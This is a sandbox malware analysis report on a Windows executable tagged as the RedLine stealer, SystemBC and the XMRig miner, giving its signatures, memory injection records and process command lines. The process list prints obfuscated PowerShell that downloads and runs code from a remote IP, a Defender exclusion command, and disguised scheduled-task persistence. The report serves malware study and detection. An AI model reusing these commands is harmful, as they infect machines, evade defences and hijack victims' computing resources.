Malware Analysis Report

2025-04-03 09:46

Sample ID 230506-y9jvrsbg46
Target 0e4e3cdacfbe29fdc3e189e52ee8228e.exe
SHA256 ac3af6bd3139c444e8e146a6d48c110ae33c09d23c84b7b02f3d7af9eaa49c84
Tags
redline systembc xmrig infostealer miner persistence stealer trojan
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V6

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

ac3af6bd3139c444e8e146a6d48c110ae33c09d23c84b7b02f3d7af9eaa49c84

Threat Level: Known bad

The file 0e4e3cdacfbe29fdc3e189e52ee8228e.exe was found to be: Known bad.

Malicious Activity Summary

redline systembc xmrig infostealer miner persistence stealer trojan

Detects Redline Stealer samples

Suspicious use of NtCreateUserProcessOtherParentProcess

xmrig

SystemBC

RedLine

XMRig Miner payload

Blocklisted process makes network request

Downloads MZ/PE file

Checks computer location settings

Loads dropped DLL

Executes dropped EXE

Looks up external IP address via web service

Adds Run key to start application

Suspicious use of NtSetInformationThreadHideFromDebugger

Drops file in System32 directory

Suspicious use of SetThreadContext

Enumerates physical storage devices

Creates scheduled task(s)

Suspicious use of WriteProcessMemory

Suspicious use of SendNotifyMessage

Uses Task Scheduler COM API

Suspicious use of FindShellTrayWindow

Delays execution with timeout.exe

Suspicious use of AdjustPrivilegeToken

Checks processor information in registry

Suspicious behavior: AddClipboardFormatListener

Suspicious behavior: EnumeratesProcesses

Suspicious behavior: LoadsDriver

Suspicious use of SetWindowsHookEx

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2023-05-06 20:29

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2023-05-06 20:29

Reported

2023-05-06 20:37

Platform

win7-20230220-en

Max time kernel

131s

Max time network

147s

Command Line

C:\Windows\Explorer.EXE

Signatures

Detects Redline Stealer samples

stealer
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

RedLine

infostealer redline

SystemBC

trojan systembc

xmrig

miner xmrig

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Downloads MZ/PE file

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\OneDrive = "C:\\ProgramData\\lsass\\lsass.exe" C:\Users\Admin\AppData\Roaming\lsass.exe N/A

Drops file in System32 directory

Description Indicator Process Target
File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of NtSetInformationThreadHideFromDebugger

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Roaming\lsass.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\lsass.exe N/A
N/A N/A C:\ProgramData\lsass\lsass.exe N/A
N/A N/A C:\ProgramData\lsass\lsass.exe N/A
N/A N/A C:\ProgramData\lsass\lsass.exe N/A
N/A N/A C:\ProgramData\lsass\lsass.exe N/A
N/A N/A C:\ProgramData\lsass\lsass.exe N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 1800 set thread context of 556 N/A C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe C:\Windows\System32\conhost.exe
PID 1800 set thread context of 1412 N/A C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe C:\Windows\System32\conhost.exe

Enumerates physical storage devices

Creates scheduled task(s)

persistence
Description Indicator Process Target
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A

Delays execution with timeout.exe

evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\timeout.exe N/A

Suspicious behavior: AddClipboardFormatListener

Description Indicator Process Target
N/A N/A C:\ProgramData\lsass\lsass.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\OneDrive.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\OneDrive.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\OneDrive.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\OneDrive.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\OneDrive.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\OneDrive.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe N/A

Suspicious behavior: LoadsDriver

Description Indicator Process Target
N/A N/A N/A N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Windows\System32\conhost.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Roaming\lsass.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Windows\System32\conhost.exe N/A
Token: SeDebugPrivilege N/A C:\ProgramData\lsass\lsass.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A

Suspicious use of SendNotifyMessage

Description Indicator Process Target
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Roaming\lsass.exe N/A
N/A N/A C:\ProgramData\lsass\lsass.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1340 wrote to memory of 2036 N/A C:\Users\Admin\AppData\Local\Temp\0e4e3cdacfbe29fdc3e189e52ee8228e.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1340 wrote to memory of 2036 N/A C:\Users\Admin\AppData\Local\Temp\0e4e3cdacfbe29fdc3e189e52ee8228e.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1340 wrote to memory of 2036 N/A C:\Users\Admin\AppData\Local\Temp\0e4e3cdacfbe29fdc3e189e52ee8228e.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1340 wrote to memory of 2044 N/A C:\Users\Admin\AppData\Local\Temp\0e4e3cdacfbe29fdc3e189e52ee8228e.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1340 wrote to memory of 2044 N/A C:\Users\Admin\AppData\Local\Temp\0e4e3cdacfbe29fdc3e189e52ee8228e.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1340 wrote to memory of 2044 N/A C:\Users\Admin\AppData\Local\Temp\0e4e3cdacfbe29fdc3e189e52ee8228e.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1340 wrote to memory of 2040 N/A C:\Users\Admin\AppData\Local\Temp\0e4e3cdacfbe29fdc3e189e52ee8228e.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1340 wrote to memory of 2040 N/A C:\Users\Admin\AppData\Local\Temp\0e4e3cdacfbe29fdc3e189e52ee8228e.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1340 wrote to memory of 2040 N/A C:\Users\Admin\AppData\Local\Temp\0e4e3cdacfbe29fdc3e189e52ee8228e.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1340 wrote to memory of 1948 N/A C:\Users\Admin\AppData\Local\Temp\0e4e3cdacfbe29fdc3e189e52ee8228e.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1340 wrote to memory of 1948 N/A C:\Users\Admin\AppData\Local\Temp\0e4e3cdacfbe29fdc3e189e52ee8228e.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1340 wrote to memory of 1948 N/A C:\Users\Admin\AppData\Local\Temp\0e4e3cdacfbe29fdc3e189e52ee8228e.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2040 wrote to memory of 1796 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Roaming\OneDrive.exe
PID 2040 wrote to memory of 1796 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Roaming\OneDrive.exe
PID 2040 wrote to memory of 1796 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Roaming\OneDrive.exe
PID 1704 wrote to memory of 1480 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\powercfg.exe
PID 1704 wrote to memory of 1480 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\powercfg.exe
PID 1704 wrote to memory of 1480 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\powercfg.exe
PID 1704 wrote to memory of 916 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\powercfg.exe
PID 1704 wrote to memory of 916 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\powercfg.exe
PID 1704 wrote to memory of 916 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\powercfg.exe
PID 1704 wrote to memory of 860 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\powercfg.exe
PID 1704 wrote to memory of 860 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\powercfg.exe
PID 1704 wrote to memory of 860 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\powercfg.exe
PID 1704 wrote to memory of 2032 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\powercfg.exe
PID 1704 wrote to memory of 2032 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\powercfg.exe
PID 1704 wrote to memory of 2032 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\powercfg.exe
PID 988 wrote to memory of 1632 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\schtasks.exe
PID 988 wrote to memory of 1632 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\schtasks.exe
PID 988 wrote to memory of 1632 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\schtasks.exe
PID 2040 wrote to memory of 1596 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Roaming\dllhost.exe
PID 2040 wrote to memory of 1596 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Roaming\dllhost.exe
PID 2040 wrote to memory of 1596 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Roaming\dllhost.exe
PID 2040 wrote to memory of 1596 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Roaming\dllhost.exe
PID 920 wrote to memory of 1800 N/A C:\Windows\system32\taskeng.exe C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe
PID 920 wrote to memory of 1800 N/A C:\Windows\system32\taskeng.exe C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe
PID 920 wrote to memory of 1800 N/A C:\Windows\system32\taskeng.exe C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe
PID 2040 wrote to memory of 1708 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Roaming\lsass.exe
PID 2040 wrote to memory of 1708 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Roaming\lsass.exe
PID 2040 wrote to memory of 1708 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Roaming\lsass.exe
PID 2040 wrote to memory of 1708 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Roaming\lsass.exe
PID 1540 wrote to memory of 268 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\powercfg.exe
PID 1540 wrote to memory of 268 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\powercfg.exe
PID 1540 wrote to memory of 268 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\powercfg.exe
PID 1540 wrote to memory of 940 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\powercfg.exe
PID 1540 wrote to memory of 940 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\powercfg.exe
PID 1540 wrote to memory of 940 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\powercfg.exe
PID 1540 wrote to memory of 1448 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\powercfg.exe
PID 1540 wrote to memory of 1448 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\powercfg.exe
PID 1540 wrote to memory of 1448 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\powercfg.exe
PID 1540 wrote to memory of 1624 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\powercfg.exe
PID 1540 wrote to memory of 1624 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\powercfg.exe
PID 1540 wrote to memory of 1624 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\powercfg.exe
PID 1016 wrote to memory of 1152 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\schtasks.exe
PID 1016 wrote to memory of 1152 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\schtasks.exe
PID 1016 wrote to memory of 1152 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\schtasks.exe
PID 1800 wrote to memory of 556 N/A C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe C:\Windows\System32\conhost.exe
PID 1800 wrote to memory of 1412 N/A C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe C:\Windows\System32\conhost.exe
PID 1708 wrote to memory of 1728 N/A C:\Users\Admin\AppData\Roaming\lsass.exe C:\Windows\SysWOW64\schtasks.exe
PID 1708 wrote to memory of 1728 N/A C:\Users\Admin\AppData\Roaming\lsass.exe C:\Windows\SysWOW64\schtasks.exe
PID 1708 wrote to memory of 1728 N/A C:\Users\Admin\AppData\Roaming\lsass.exe C:\Windows\SysWOW64\schtasks.exe
PID 1708 wrote to memory of 1728 N/A C:\Users\Admin\AppData\Roaming\lsass.exe C:\Windows\SysWOW64\schtasks.exe
PID 1708 wrote to memory of 1668 N/A C:\Users\Admin\AppData\Roaming\lsass.exe C:\ProgramData\lsass\lsass.exe
PID 1708 wrote to memory of 1668 N/A C:\Users\Admin\AppData\Roaming\lsass.exe C:\ProgramData\lsass\lsass.exe

Uses Task Scheduler COM API

persistence

Processes

C:\Windows\Explorer.EXE

C:\Windows\Explorer.EXE

C:\Users\Admin\AppData\Local\Temp\0e4e3cdacfbe29fdc3e189e52ee8228e.exe

"C:\Users\Admin\AppData\Local\Temp\0e4e3cdacfbe29fdc3e189e52ee8228e.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -enc IABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQwA6AFwA

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -enc JABmADUAPQAnAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvACcAOwAgACQAZgAxAD0AJwAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQAnADsAIAAkAGYAMwA9ACcAYQBkAFMAdAByAGkAbgBnACgAJwAnAGgAdAB0AHAAOgAvAC8ANgAyAC4AMgAwADQALgA0ADEALgAyADMALwBvAC4AcABuAGcAJwAnACkAJwA7ACQARwBPAE8APQBJAGAARQBgAFgAIAAoACQAZgAxACwAJABmADUALAAkAGYAMwAgAC0ASgBvAGkAbgAgACcAJwApAHwASQBgAEUAYABYAA==

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -enc JABmADUAPQAnAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvACcAOwAgACQAZgAxAD0AJwAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQAnADsAIAAkAGYAMwA9ACcAYQBkAFMAdAByAGkAbgBnACgAJwAnAGgAdAB0AHAAOgAvAC8ANgAyAC4AMgAwADQALgA0ADEALgAyADMALwBmAGkAbABlAC4AcABuAGcAJwAnACkAJwA7ACQARwBPAE8APQBJAGAARQBgAFgAIAAoACQAZgAxACwAJABmADUALAAkAGYAMwAgAC0ASgBvAGkAbgAgACcAJwApAHwASQBgAEUAYABYAA==

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -enc JABmADUAPQAnAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvACcAOwAgACQAZgAxAD0AJwAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQAnADsAIAAkAGYAMwA9ACcAYQBkAFMAdAByAGkAbgBnACgAJwAnAGgAdAB0AHAAOgAvAC8ANgAyAC4AMgAwADQALgA0ADEALgAyADMALwByAC4AcABuAGcAJwAnACkAJwA7ACQARwBPAE8APQBJAGAARQBgAFgAIAAoACQAZgAxACwAJABmADUALAAkAGYAMwAgAC0ASgBvAGkAbgAgACcAJwApAHwASQBgAEUAYABYAA==

C:\Users\Admin\AppData\Roaming\OneDrive.exe

"C:\Users\Admin\AppData\Roaming\OneDrive.exe"

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#uxwihwxmk#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'OneDrive' /tr '''C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'OneDrive' -RunLevel 'Highest' -Force; }

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-ac 0

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-dc 0

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-ac 0

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-dc 0

C:\Windows\system32\schtasks.exe

"C:\Windows\system32\schtasks.exe" /create /f /sc onlogon /rl highest /tn OneDrive /tr 'C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe'

C:\Users\Admin\AppData\Roaming\dllhost.exe

"C:\Users\Admin\AppData\Roaming\dllhost.exe"

C:\Windows\System32\schtasks.exe

C:\Windows\System32\schtasks.exe /run /tn "OneDrive"

C:\Windows\system32\taskeng.exe

taskeng.exe {A8F10B29-F43F-4D1C-BC67-A54E08F3A561} S-1-5-21-2647223082-2067913677-935928954-1000:BPOQNXYB\Admin:Interactive:[1]

C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe

C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe

C:\Users\Admin\AppData\Roaming\lsass.exe

"C:\Users\Admin\AppData\Roaming\lsass.exe"

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#uxwihwxmk#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'OneDrive' /tr '''C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'OneDrive' -RunLevel 'Highest' -Force; }

C:\Windows\System32\powercfg.exe

